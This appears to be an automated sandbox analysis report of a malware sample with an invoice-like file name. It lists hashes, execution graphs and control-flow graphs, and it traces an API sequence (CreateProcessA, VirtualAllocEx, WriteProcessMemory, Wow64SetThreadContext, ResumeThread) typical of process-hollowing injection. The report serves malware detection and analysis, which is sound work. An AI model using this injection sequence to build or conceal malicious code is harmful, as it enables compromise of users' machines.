                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da851fdbc58ed6133a1725b9f8a1021631f555588915fabea0029096119977ab
                                      • Instruction ID: bfe8860fe64f25648a7d4d20e93814000bf97c01932328395282e3e7c904a3b1
                                      • Opcode Fuzzy Hash: da851fdbc58ed6133a1725b9f8a1021631f555588915fabea0029096119977ab
                                      • Instruction Fuzzy Hash: 30512BB4E102198FCB14CFAAC5809AEFBF6FF89301F248169D418AB356D7309941CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8eab51ed410991ce1a725a335486fe81bdaf5202f633d7cc719a2b04a8a8d6c9
                                      • Instruction ID: 4d939e48d180aeb8b3fa771e4c53feebb4f1e7887cc7b349c6c30ac151a702fb
                                      • Opcode Fuzzy Hash: 8eab51ed410991ce1a725a335486fe81bdaf5202f633d7cc719a2b04a8a8d6c9
                                      • Instruction Fuzzy Hash: B5E01AB4979004CFCB20AFA4A8595F8BB78EB4B202F0420A1950EA6582C6714A518B64

                                      Execution Graph

                                      Execution Coverage:10.7%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:253
                                      Total number of Limit Nodes:22
                                      execution_graph 36008 6e10040 36009 6e1007b 36008->36009 36010 6e1006a 36008->36010 36011 6e10109 36009->36011 36014 6e10360 36009->36014 36019 6e10370 36009->36019 36015 6e10398 36014->36015 36016 6e1049e 36015->36016 36024 6e10e90 36015->36024 36029 6e10e48 36015->36029 36016->36010 36020 6e10398 36019->36020 36021 6e1049e 36020->36021 36022 6e10e90 DrawTextExW 36020->36022 36023 6e10e48 DrawTextExW 36020->36023 36021->36010 36022->36021 36023->36021 36025 6e10ea6 36024->36025 36034 6e112a0 36025->36034 36038 6e112b0 36025->36038 36026 6e10f1c 36026->36016 36030 6e10e4d 36029->36030 36032 6e112a0 DrawTextExW 36030->36032 36033 6e112b0 DrawTextExW 36030->36033 36031 6e10f1c 36031->36016 36032->36031 36033->36031 36042 6e112e0 36034->36042 36047 6e112f0 36034->36047 36035 6e112ce 36035->36026 36039 6e112ce 36038->36039 36040 6e112e0 DrawTextExW 36038->36040 36041 6e112f0 DrawTextExW 36038->36041 36039->36026 36040->36039 36041->36039 36043 6e11321 36042->36043 36044 6e1134e 36043->36044 36052 6e11370 36043->36052 36057 6e11368 36043->36057 36044->36035 36048 6e11321 36047->36048 36049 6e1134e 36048->36049 36050 6e11370 DrawTextExW 36048->36050 36051 6e11368 DrawTextExW 36048->36051 36049->36035 36050->36049 36051->36049 36054 6e11391 36052->36054 36053 6e113a6 36053->36044 36054->36053 36062 6e10cac 36054->36062 36056 6e11411 36059 6e11391 36057->36059 36058 6e113a6 36058->36044 36059->36058 36060 6e10cac DrawTextExW 36059->36060 36061 6e11411 36060->36061 36064 6e10cb7 36062->36064 36063 6e12fd9 36063->36056 36064->36063 36068 6e13f60 36064->36068 36071 6e13f4f 36064->36071 36065 6e130ec 36065->36056 36075 6e1329c 36068->36075 36072 6e13f54 36071->36072 36073 6e13f7d 36072->36073 36074 6e1329c DrawTextExW 36072->36074 36073->36065 36074->36073 36076 6e13f98 DrawTextExW 36075->36076 36078 6e13f7d 36076->36078 36078->36065 35973 b4ad30 35977 b4ae28 35973->35977 35982 b4ae18 35973->35982 35974 b4ad3f 35978 b4ae5c 35977->35978 35979 b4ae39 35977->35979 35978->35974 35979->35978 35980 b4b060 GetModuleHandleW 35979->35980 35981 b4b08d 35980->35981 35981->35974 35983 b4ae5c 35982->35983 35985 b4ae39 35982->35985 35983->35974 35984 b4b060 GetModuleHandleW 35986 b4b08d 35984->35986 35985->35983 35985->35984 35986->35974 36086 b4d0c0 36087 b4d106 36086->36087 36091 b4d6a8 36087->36091 36094 b4d699 36087->36094 36088 b4d1f3 36097 b4d2fc 36091->36097 36095 b4d6d6 36094->36095 36096 b4d2fc DuplicateHandle 36094->36096 36095->36088 36096->36095 36098 b4d710 DuplicateHandle 36097->36098 36099 b4d6d6 36098->36099 36099->36088 36100 81080e6 36102 8107f16 36100->36102 36101 8108116 36102->36101 36106 81097b0 36102->36106 36124 810980e 36102->36124 36143 81097a1 36102->36143 36107 81097ca 36106->36107 36161 8109eb0 36107->36161 36169 8109f6f 36107->36169 36174 810a269 36107->36174 36179 8109cc9 36107->36179 36189 810a4c7 36107->36189 36193 8109ee3 36107->36193 36203 810a501 36107->36203 36207 810a0c1 36107->36207 36212 810a05f 36107->36212 36217 8109c3e 36107->36217 36222 8109d5b 36107->36222 36230 8109c97 36107->36230 36235 8109dd3 36107->36235 36240 810a013 36107->36240 36245 810a2d1 36107->36245 36108 81097ee 36108->36101 36125 810979c 36124->36125 36127 8109811 36124->36127 36128 8109eb0 4 API calls 36125->36128 36129 810a2d1 2 API calls 36125->36129 36130 810a013 2 API calls 36125->36130 36131 8109dd3 2 API calls 36125->36131 36132 8109c97 2 API calls 36125->36132 36133 8109d5b 4 API calls 36125->36133 36134 8109c3e 2 API calls 36125->36134 36135 810a05f 2 API calls 36125->36135 36136 810a0c1 2 API calls 36125->36136 36137 810a501 2 API calls 36125->36137 36138 8109ee3 6 API calls 36125->36138 36139 810a4c7 2 API calls 36125->36139 36140 8109cc9 4 API calls 36125->36140 36141 810a269 2 API calls 36125->36141 36142 8109f6f 2 API calls 36125->36142 36126 81097ee 36126->36101 36127->36101 36128->36126 36129->36126 36130->36126 36131->36126 36132->36126 36133->36126 36134->36126 36135->36126 36136->36126 36137->36126 36138->36126 36139->36126 36140->36126 36141->36126 36142->36126 36144 81097ca 36143->36144 36146 8109eb0 4 API calls 36144->36146 36147 810a2d1 2 API calls 36144->36147 36148 810a013 2 API calls 36144->36148 36149 8109dd3 2 API calls 36144->36149 36150 8109c97 2 API calls 36144->36150 36151 8109d5b 4 API calls 36144->36151 36152 8109c3e 2 API calls 36144->36152 36153 810a05f 2 API calls 36144->36153 36154 810a0c1 2 API calls 36144->36154 36155 810a501 2 API calls 36144->36155 36156 8109ee3 6 API calls 36144->36156 36157 810a4c7 2 API calls 36144->36157 36158 8109cc9 4 API calls 36144->36158 36159 810a269 2 API calls 36144->36159 36160 8109f6f 2 API calls 36144->36160 36145 81097ee 36145->36101 36146->36145 36147->36145 36148->36145 36149->36145 36150->36145 36151->36145 36152->36145 36153->36145 36154->36145 36155->36145 36156->36145 36157->36145 36158->36145 36159->36145 36160->36145 36162 8109d79 36161->36162 36258 81077b0 36162->36258 36262 81077b8 36162->36262 36163 810a4a2 36164 8109ca3 36164->36163 36250 8107870 36164->36250 36254 8107878 36164->36254 36170 8109f78 36169->36170 36172 8107870 WriteProcessMemory 36170->36172 36173 8107878 WriteProcessMemory 36170->36173 36171 810a24a 36172->36171 36173->36171 36175 810a26f 36174->36175 36266 8107630 36175->36266 36270 8107628 36175->36270 36176 810a33b 36176->36108 36180 8109d12 36179->36180 36181 8109ce8 36179->36181 36185 8107630 ResumeThread 36180->36185 36186 8107628 ResumeThread 36180->36186 36181->36180 36182 8109ca3 36181->36182 36184 810a633 36182->36184 36187 8107870 WriteProcessMemory 36182->36187 36188 8107878 WriteProcessMemory 36182->36188 36183 810a33b 36183->36108 36185->36183 36186->36183 36187->36182 36188->36182 36274 81076d8 36189->36274 36278 81076e0 36189->36278 36190 810a4e1 36282 8107961 36193->36282 36286 8107968 36193->36286 36194 8109d79 36194->36108 36197 81077b0 VirtualAllocEx 36194->36197 36198 81077b8 VirtualAllocEx 36194->36198 36195 8109ca3 36196 810a4a2 36195->36196 36201 8107870 WriteProcessMemory 36195->36201 36202 8107878 WriteProcessMemory 36195->36202 36197->36195 36198->36195 36201->36195 36202->36195 36205 8107870 WriteProcessMemory 36203->36205 36206 8107878 WriteProcessMemory 36203->36206 36204 810a52f 36205->36204 36206->36204 36208 810a633 36207->36208 36209 8109ca3 36207->36209 36208->36108 36209->36208 36210 8107870 WriteProcessMemory 36209->36210 36211 8107878 WriteProcessMemory 36209->36211 36210->36209 36211->36209 36213 810a065 36212->36213 36214 810a633 36213->36214 36215 8107870 WriteProcessMemory 36213->36215 36216 8107878 WriteProcessMemory 36213->36216 36215->36213 36216->36213 36218 8109c44 36217->36218 36290 8107b00 36218->36290 36294 8107af5 36218->36294 36223 8109d61 36222->36223 36226 81077b0 VirtualAllocEx 36223->36226 36227 81077b8 VirtualAllocEx 36223->36227 36224 8109ca3 36225 810a4a2 36224->36225 36228 8107870 WriteProcessMemory 36224->36228 36229 8107878 WriteProcessMemory 36224->36229 36226->36224 36227->36224 36228->36224 36229->36224 36231 8109ca3 36230->36231 36232 810a633 36231->36232 36233 8107870 WriteProcessMemory 36231->36233 36234 8107878 WriteProcessMemory 36231->36234 36233->36231 36234->36231 36236 8109ca3 36235->36236 36237 810a633 36236->36237 36238 8107870 WriteProcessMemory 36236->36238 36239 8107878 WriteProcessMemory 36236->36239 36238->36236 36239->36236 36241 810a287 36240->36241 36243 81076e0 Wow64SetThreadContext 36241->36243 36244 81076d8 Wow64SetThreadContext 36241->36244 36242 810a2a2 36243->36242 36244->36242 36246 810a2da 36245->36246 36248 8107630 ResumeThread 36246->36248 36249 8107628 ResumeThread 36246->36249 36247 810a33b 36247->36108 36248->36247 36249->36247 36251 8107876 WriteProcessMemory 36250->36251 36253 8107917 36251->36253 36253->36164 36255 81078b2 WriteProcessMemory 36254->36255 36257 8107917 36255->36257 36257->36164 36259 81077f8 VirtualAllocEx 36258->36259 36261 8107835 36259->36261 36261->36164 36263 81077f8 VirtualAllocEx 36262->36263 36265 8107835 36263->36265 36265->36164 36267 8107670 ResumeThread 36266->36267 36269 81076a1 36267->36269 36269->36176 36271 8107630 ResumeThread 36270->36271 36273 81076a1 36271->36273 36273->36176 36275 81076e0 Wow64SetThreadContext 36274->36275 36277 810776d 36275->36277 36277->36190 36279 8107725 Wow64SetThreadContext 36278->36279 36281 810776d 36279->36281 36281->36190 36283 81079b3 ReadProcessMemory 36282->36283 36285 81079f7 36283->36285 36285->36194 36287 81079b3 ReadProcessMemory 36286->36287 36289 81079f7 36287->36289 36289->36194 36291 8107b89 CreateProcessA 36290->36291 36293 8107d4b 36291->36293 36295 8107b00 CreateProcessA 36294->36295 36297 8107d4b 36295->36297 36079 810a978 36080 810ab03 36079->36080 36082 810a99e 36079->36082 36082->36080 36083 8104458 36082->36083 36084 810abf8 PostMessageW 36083->36084 36085 810ac64 36084->36085 36085->36082 35987 b44668 35988 b4467a 35987->35988 35989 b44686 35988->35989 35991 b44779 35988->35991 35992 b4479d 35991->35992 35996 b44888 35992->35996 36000 b44878 35992->36000 35997 b448af 35996->35997 35998 b4498c 35997->35998 36004 b444b0 35997->36004 36002 b44888 36000->36002 36001 b4498c 36002->36001 36003 b444b0 CreateActCtxA 36002->36003 36003->36001 36005 b45918 CreateActCtxA 36004->36005 36007 b459db 36005->36007

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 608 8107af5-8107b95 611 8107b97-8107ba1 608->611 612 8107bce-8107bee 608->612 611->612 613 8107ba3-8107ba5 611->613 617 8107bf0-8107bfa 612->617 618 8107c27-8107c56 612->618 615 8107ba7-8107bb1 613->615 616 8107bc8-8107bcb 613->616 619 8107bb3 615->619 620 8107bb5-8107bc4 615->620 616->612 617->618 622 8107bfc-8107bfe 617->622 626 8107c58-8107c62 618->626 627 8107c8f-8107d49 CreateProcessA 618->627 619->620 620->620 621 8107bc6 620->621 621->616 623 8107c00-8107c0a 622->623 624 8107c21-8107c24 622->624 628 8107c0c 623->628 629 8107c0e-8107c1d 623->629 624->618 626->627 630 8107c64-8107c66 626->630 640 8107d52-8107dd8 627->640 641 8107d4b-8107d51 627->641 628->629 629->629 631 8107c1f 629->631 632 8107c68-8107c72 630->632 633 8107c89-8107c8c 630->633 631->624 635 8107c74 632->635 636 8107c76-8107c85 632->636 633->627 635->636 636->636 637 8107c87 636->637 637->633 651 8107de8-8107dec 640->651 652 8107dda-8107dde 640->652 641->640 654 8107dfc-8107e00 651->654 655 8107dee-8107df2 651->655 652->651 653 8107de0 652->653 653->651 657 8107e10-8107e14 654->657 658 8107e02-8107e06 654->658 655->654 656 8107df4 655->656 656->654 660 8107e26-8107e2d 657->660 661 8107e16-8107e1c 657->661 658->657 659 8107e08 658->659 659->657 662 8107e44 660->662 663 8107e2f-8107e3e 660->663 661->660 665 8107e45 662->665 663->662 665->665
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08107D36
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: f5df23cad0f41b20c9c0148d9528be99df53fb60ac8cdced5f1df989b8cda834
                                      • Instruction ID: e507d97b44342f0e21b60eb478fe52597303c66c500eeedf7b147563c41a47ad
                                      • Opcode Fuzzy Hash: f5df23cad0f41b20c9c0148d9528be99df53fb60ac8cdced5f1df989b8cda834
                                      • Instruction Fuzzy Hash: 3BA14C71D00219CFDB14DF68CD41BADBBB2BF48311F1489A9E809A72D0DBB59985CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 666 8107b00-8107b95 668 8107b97-8107ba1 666->668 669 8107bce-8107bee 666->669 668->669 670 8107ba3-8107ba5 668->670 674 8107bf0-8107bfa 669->674 675 8107c27-8107c56 669->675 672 8107ba7-8107bb1 670->672 673 8107bc8-8107bcb 670->673 676 8107bb3 672->676 677 8107bb5-8107bc4 672->677 673->669 674->675 679 8107bfc-8107bfe 674->679 683 8107c58-8107c62 675->683 684 8107c8f-8107d49 CreateProcessA 675->684 676->677 677->677 678 8107bc6 677->678 678->673 680 8107c00-8107c0a 679->680 681 8107c21-8107c24 679->681 685 8107c0c 680->685 686 8107c0e-8107c1d 680->686 681->675 683->684 687 8107c64-8107c66 683->687 697 8107d52-8107dd8 684->697 698 8107d4b-8107d51 684->698 685->686 686->686 688 8107c1f 686->688 689 8107c68-8107c72 687->689 690 8107c89-8107c8c 687->690 688->681 692 8107c74 689->692 693 8107c76-8107c85 689->693 690->684 692->693 693->693 694 8107c87 693->694 694->690 708 8107de8-8107dec 697->708 709 8107dda-8107dde 697->709 698->697 711 8107dfc-8107e00 708->711 712 8107dee-8107df2 708->712 709->708 710 8107de0 709->710 710->708 714 8107e10-8107e14 711->714 715 8107e02-8107e06 711->715 712->711 713 8107df4 712->713 713->711 717 8107e26-8107e2d 714->717 718 8107e16-8107e1c 714->718 715->714 716 8107e08 715->716 716->714 719 8107e44 717->719 720 8107e2f-8107e3e 717->720 718->717 722 8107e45 719->722 720->719 722->722
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08107D36
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: c1232bda056bc4f72bff2f3096b43fa1ddbab45b502de9d598c60ccacafbddd8
                                      • Instruction ID: f93d37b6141a0135975576afa6e78592715e8bfa7099d2943411d3f61f01d2d2
                                      • Opcode Fuzzy Hash: c1232bda056bc4f72bff2f3096b43fa1ddbab45b502de9d598c60ccacafbddd8
                                      • Instruction Fuzzy Hash: C6913D71D00219CFDB14DF68CD41BADBBB2BF48311F1485A9E809A72D0DBB59985CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 723 b4ae28-b4ae37 724 b4ae63-b4ae67 723->724 725 b4ae39-b4ae46 call b4a14c 723->725 727 b4ae69-b4ae73 724->727 728 b4ae7b-b4aebc 724->728 731 b4ae5c 725->731 732 b4ae48 725->732 727->728 734 b4aebe-b4aec6 728->734 735 b4aec9-b4aed7 728->735 731->724 780 b4ae4e call b4b0b0 732->780 781 b4ae4e call b4b0c0 732->781 734->735 736 b4aed9-b4aede 735->736 737 b4aefb-b4aefd 735->737 739 b4aee0-b4aee7 call b4a158 736->739 740 b4aee9 736->740 742 b4af00-b4af07 737->742 738 b4ae54-b4ae56 738->731 741 b4af98-b4afaf 738->741 744 b4aeeb-b4aef9 739->744 740->744 756 b4afb1-b4b010 741->756 745 b4af14-b4af1b 742->745 746 b4af09-b4af11 742->746 744->742 749 b4af1d-b4af25 745->749 750 b4af28-b4af31 call b4a168 745->750 746->745 749->750 754 b4af33-b4af3b 750->754 755 b4af3e-b4af43 750->755 754->755 757 b4af45-b4af4c 755->757 758 b4af61-b4af6e 755->758 774 b4b012-b4b058 756->774 757->758 759 b4af4e-b4af5e call b4a178 call b4a188 757->759 765 b4af70-b4af8e 758->765 766 b4af91-b4af97 758->766 759->758 765->766 775 b4b060-b4b08b GetModuleHandleW 774->775 776 b4b05a-b4b05d 774->776 777 b4b094-b4b0a8 775->777 778 b4b08d-b4b093 775->778 776->775 778->777 780->738 781->738
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B07E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 2c4d27a9549e8c39227ae42629f6582a7a78be8376d0b34fdd13be7f9391cfa7
                                      • Instruction ID: 82ed8f602d6e6e984de780d196efc66301d65db24858f9c2d9b19a907c487e21
                                      • Opcode Fuzzy Hash: 2c4d27a9549e8c39227ae42629f6582a7a78be8376d0b34fdd13be7f9391cfa7
                                      • Instruction Fuzzy Hash: B57123B0A00B058FDB24DF29D45475ABBF5FF88300F10896DE49AD7A50D774EA49CB92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 782 b444b0-b459d9 CreateActCtxA 785 b459e2-b45a3c 782->785 786 b459db-b459e1 782->786 793 b45a3e-b45a41 785->793 794 b45a4b-b45a4f 785->794 786->785 793->794 795 b45a60 794->795 796 b45a51-b45a5d 794->796 798 b45a61 795->798 796->795 798->798
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00B459C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 97c50f37e541c16c8327029829cc2be2827390d912ae36a554f1cc3cfd40e538
                                      • Instruction ID: c1f9559b68ffcf4fc48c1de3836c054eafc2220ff6c247ed4ed9c231c452ee1a
                                      • Opcode Fuzzy Hash: 97c50f37e541c16c8327029829cc2be2827390d912ae36a554f1cc3cfd40e538
                                      • Instruction Fuzzy Hash: 1441C1B0C00A1DCBDB24DFA9C884B9DBBF5FF49304F20816AD408AB255DB75A946CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 799 b4590c-b45912 800 b4591c-b459d9 CreateActCtxA 799->800 802 b459e2-b45a3c 800->802 803 b459db-b459e1 800->803 810 b45a3e-b45a41 802->810 811 b45a4b-b45a4f 802->811 803->802 810->811 812 b45a60 811->812 813 b45a51-b45a5d 811->813 815 b45a61 812->815 813->812 815->815
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00B459C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: e96f1b0795eb988f8e3151a3b710dbabccc1b8bf89c667123be0e8dae1057abc
                                      • Instruction ID: c16b8b09593507184d979cae9c35956d36d877b8e44836d805fcf50456ab2c91
                                      • Opcode Fuzzy Hash: e96f1b0795eb988f8e3151a3b710dbabccc1b8bf89c667123be0e8dae1057abc
                                      • Instruction Fuzzy Hash: 7B41F2B1C00B19CBDB25DFA9C884BCDBBF1BF49304F24806AD418AB265DB75694ACF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 816 8107870-8107874 817 81078b2-81078c6 816->817 818 8107876-81078b1 816->818 822 81078d6-8107915 WriteProcessMemory 817->822 823 81078c8-81078d4 817->823 818->817 825 8107917-810791d 822->825 826 810791e-810794e 822->826 823->822 825->826
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08107908
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: beb99f3b1757bd7f1ae49a60954fb51365e83c199409283b89c19f602abf3d16
                                      • Instruction ID: f7d57c35b58ea97bac297b6ad9217d86537bb20fcd8cd8d881e73f89361d468c
                                      • Opcode Fuzzy Hash: beb99f3b1757bd7f1ae49a60954fb51365e83c199409283b89c19f602abf3d16
                                      • Instruction Fuzzy Hash: 42214C719003099FCB10DFA9C9457DEBBF5FF48311F10852AE959A7290D7799550CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 830 6e1329c-6e13fe4 832 6e13fe6-6e13fec 830->832 833 6e13fef-6e13ffe 830->833 832->833 834 6e14000 833->834 835 6e14003-6e1403c DrawTextExW 833->835 834->835 836 6e14045-6e14062 835->836 837 6e1403e-6e14044 835->837 837->836
                                      APIs
                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06E13F7D,?,?), ref: 06E1402F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133720651.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6e10000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: DrawText
                                      • String ID:
                                      • API String ID: 2175133113-0
                                      • Opcode ID: 99edb8e2e2690a2b547ac2ec758e3d3aa91184a5fd98d2a10565ef3569593452
                                      • Instruction ID: 89c04c7b7fe942f518a6a313ad1de02b6e5d3431bcd3a602fe9f27a199d9b074
                                      • Opcode Fuzzy Hash: 99edb8e2e2690a2b547ac2ec758e3d3aa91184a5fd98d2a10565ef3569593452
                                      • Instruction Fuzzy Hash: 7031E0B5D003099FDB10DF9AD884AEEBBF5FB58310F24842AE919A7350D375A944CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 840 6e13f90-6e13fe4 841 6e13fe6-6e13fec 840->841 842 6e13fef-6e13ffe 840->842 841->842 843 6e14000 842->843 844 6e14003-6e1403c DrawTextExW 842->844 843->844 845 6e14045-6e14062 844->845 846 6e1403e-6e14044 844->846 846->845
                                      APIs
                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06E13F7D,?,?), ref: 06E1402F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133720651.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6e10000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: DrawText
                                      • String ID:
                                      • API String ID: 2175133113-0
                                      • Opcode ID: 015df8d8d32713ceda0d0d945f5ebb29c3a2c3aaaf16aa7ed9b794a30f4590a2
                                      • Instruction ID: e4ff87624651054646b071f689b929a1d3e1e72f6d08362de2a63825a7ab8c15
                                      • Opcode Fuzzy Hash: 015df8d8d32713ceda0d0d945f5ebb29c3a2c3aaaf16aa7ed9b794a30f4590a2
                                      • Instruction Fuzzy Hash: EF31E0B5D013099FCB10CFAAD884ADEBBF5BB58310F24842AE918A7350D375A944CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 849 8107878-81078c6 853 81078d6-8107915 WriteProcessMemory 849->853 854 81078c8-81078d4 849->854 856 8107917-810791d 853->856 857 810791e-810794e 853->857 854->853 856->857
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08107908
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 9466c956b1afd3a3d7b6f8461c368d62354738f95337737bab205572ee389e09
                                      • Instruction ID: 703029ab34cb5883ee83630869ad358ecdc896c4dde669a4c08041aea07f8486
                                      • Opcode Fuzzy Hash: 9466c956b1afd3a3d7b6f8461c368d62354738f95337737bab205572ee389e09
                                      • Instruction Fuzzy Hash: 21210AB19003499FCB10DFAAC945BDEBBF5FF48310F10842AE919A7291D779A954CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 861 81076d8-810772b 864 810773b-810776b Wow64SetThreadContext 861->864 865 810772d-8107739 861->865 867 8107774-81077a4 864->867 868 810776d-8107773 864->868 865->864 868->867
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0810775E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: e9aac8f19dc946c5c2bbc65243300c405c4694f7554fe4b26398f5e99f42e763
                                      • Instruction ID: e8d8ce9e5f663addaee459fa0975df64ca348c13d14297ad0ac9a104141176de
                                      • Opcode Fuzzy Hash: e9aac8f19dc946c5c2bbc65243300c405c4694f7554fe4b26398f5e99f42e763
                                      • Instruction Fuzzy Hash: 8A2148B19003098FDB10DFAAC8857EEBBF4EF48314F14842AD459A7281CB78A944CFA1
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D6D6,?,?,?,?,?), ref: 00B4D797
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: be5f6e4794fa0d6caac39851db9095a71a839144596d73c98e2d416ea52570cb
                                      • Instruction ID: 32da782c5f696c9b4e43f145e2b2dbea50e2072aa1e6662a852c79b7497b9530
                                      • Opcode Fuzzy Hash: be5f6e4794fa0d6caac39851db9095a71a839144596d73c98e2d416ea52570cb
                                      • Instruction Fuzzy Hash: 7321E6B5900248DFDB10CF9AD584AEEFBF4FB48310F14845AE914A3351D378A950DFA4
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081079E8
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 4f91fcebe9da9bf343af1fe77700904cc228d0d2a64a7624e1846acf091066a2
                                      • Instruction ID: 25314cdd3c76c7ecf2f06c66e46feba69ad799ff9b75ac16506b8c386758b7e4
                                      • Opcode Fuzzy Hash: 4f91fcebe9da9bf343af1fe77700904cc228d0d2a64a7624e1846acf091066a2
                                      • Instruction Fuzzy Hash: 052119B1800249DFCB10DFAAC945AEEBBF5FF48320F14842EE959A7251C7799954CBA0
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D6D6,?,?,?,?,?), ref: 00B4D797
                                      Memory Dump Source
